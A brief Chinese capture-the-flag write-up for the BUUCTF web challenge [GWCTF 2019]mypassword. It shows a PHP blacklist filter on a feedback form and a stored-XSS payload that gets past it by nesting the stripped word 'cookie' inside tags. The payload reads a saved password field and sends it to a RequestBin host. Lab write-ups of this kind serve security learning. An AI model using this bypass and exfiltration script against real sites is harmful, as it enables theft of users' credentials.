145，【5】 buuctf web [GWCTF 2019]mypassword

进入靶场

修改了url后才到了注册页面

注测后再登录

查看源码

都点进去看看

 有个反馈页面

再查看源码

 又有收获

// 检查$feedback是否为数组
if (is_array($feedback)) {
    // 如果是数组，弹出提示框提示反馈不合法
    echo "<script>alert('反馈不合法');</script>";
    // 返回false，表示反馈不符合要求
    return false;
}
// 定义一个黑名单数组，包含一些不允许在反馈中出现的关键字和特殊字符
$blacklist = ['_', '\'', '&', '\\', '#', '%', 'input','script', 'iframe', 'host', 'onload', 'onerror','srcdoc', 'location','svg', 'form', 'img','src', 'getElement', 'document', 'cookie'];
// 遍历黑名单数组
foreach ($blacklist as $val) {
    // 进入循环，不断检查和替换
    while (true) {
        // 不区分大小写地检查$feedback中是否包含当前黑名单中的值
        if (stripos($feedback, $val)!== false) {
            // 如果包含，不区分大小写地将其从$feedback中替换为空字符串
            $feedback = str_ireplace($val, "", $feedback);
        } else {
            // 如果不包含，跳出当前循环
            break;
        }
    }
}

用到下面网站

RequestBin — Collect, inspect and debug HTTP requests and webhooks

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/1a5ujib1/?a="+psw;
</scrcookieipt>

 最后在网站上可以得到flag